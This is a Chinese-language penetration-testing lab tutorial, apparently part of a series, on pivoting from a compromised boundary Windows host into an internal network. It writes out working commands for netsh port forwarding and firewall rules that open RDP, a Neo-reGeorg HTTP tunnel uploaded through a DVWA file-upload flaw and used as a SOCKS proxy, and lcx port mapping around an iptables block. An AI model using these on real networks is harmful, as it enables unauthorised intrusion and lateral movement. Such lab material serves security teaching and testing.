内网常见隧道工具的使用( 三 ) _内网

例如：假设边界主机是一台windows，并且我们已经获取了相应的权限。接下来要做的事情是向内网继续进行渗透。
实验拓扑：
# V-PS主机：192.168.226.113# 边界windows主机：192.168.226.133/192.168.100.100（双网卡）# 内网服务器：192.168.100.101由于V-PS无法直接访问内网的服务，因此在边界windows主机上做一个端口转发，将流量转发到内网主机的某个端口上。（以访问内网80端口为例）
# 以下操作实在windows边界主机上进行的# 监听所有主机访问本机8080端口，将流量转发到内网的80端口netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=8080 connectaddress=192.168.100.101 connectport=80# 接下来，当我们访问该主机的8080端口时，相当于访问了内网的Web服务器# 查看我们建立的转发规则netsh interface portproxy show v4tov4

文章插图

# 删除我们建立转发规则netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=8080

文章插图

考虑到另外一种场景：由于防火墙的限制，该windows主机只开放了几个端口，而你又想访问其他端口（例如3389）
此时可以做一个本地端口转发，将3389端口的流量映射到其他开放的端口上

# 实现命令（假设12345端口对外开放）netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=12345 connectaddress=127.0.0.1 connectport=3389# 当外部主机访问该主机的12345时，相当于访问本机的3389端口

（2）netsh配置防火墙netsh配置防火墙有两个参数firewall和advfirewall（firewall是简单模式、advfirewall是高级模式）

文章插图

例如：# 开放3389端口netsh advfirewall firewall add rule name="openRDP" dir=in protocol=tcp localport=3389 action=allow(name表示给该规则命名，dir表示流量方向)

文章插图

去查看防火墙规则，也可以看见此规则添加成功。

文章插图

# 删除上述规则netsh advfirewall firewall delete rule name="openRDP" protocol=tcp localport=3389

文章插图

5、Neo-reGeorgNeo-reGeory是一款建立HTTP隧道的工具，适用于目标服务器只开放了80端口，通过80端口去探测内网服务器。（利用文件上传漏洞即可）
最常见的使用应该还是搭建一个socks代理
（尝试了一下reGeory，搭代理后去访问内网的80端口，结果是408 。但是使用Neo-reGeorg可以直接访问，也许是环境的问题）

# 简单搭建socks代理实现# 创建隧道文件Python neoreg.py generate -k password# 通过一定的方式将相应脚本文件传到目标服务器# 本次实验采用的是dvwa，上传php脚本文件tunnel.php 执行:python neoreg.py -k password -u http://192.168.226.133/dvwa/hackable/uploads/tunnel.php -p 1080(将本地1080端口的流量转发到目标服务器)# 配置socks5代理/etc/proxychains.conf或者浏览器配置socks5socks5 127.0.0.1 1080# 访问内网的80服务proxychains curl 192.168.100.101

文章插图

6、Lcx【内网常见隧道工具的使用】lcx也是一款强大的内网端口转发工具，现已经有了跨平台的工具，在Linux和Windows下都可以使用
由于是做端口转发，因此考虑一下几种场景：
实现一：22端口不出网做本地端口转发连接ssh

# 由于防火墙限制，现在中间服务器的22号端口禁止对外开放# 配置iptables（由于环境原因，将V-PS作为靶机，中间主机作为攻击机），在V-PS上配置防火墙iptables -A OUTPUT -p tcp -d 192.168.226.133 --sport 22 -j DROP# 将从22号端口出去的流向192.168.226.133主机的流量丢弃掉# 直接去访问V-PS的22号端口连接不了ssh m1sn0w@192.168.226.130# 利用lcx实现本地端口转发，将22号流量转发到其他允许出网的端口上面（V-PS上执行）# 表示将10003端口的流量都转发给22号端口./portmap -m 1 -p1 10003 -h2 127.0.0.1 -p2 22# 再次连接即可成功ssh m1sn0w@192.168.226.130 -p 10003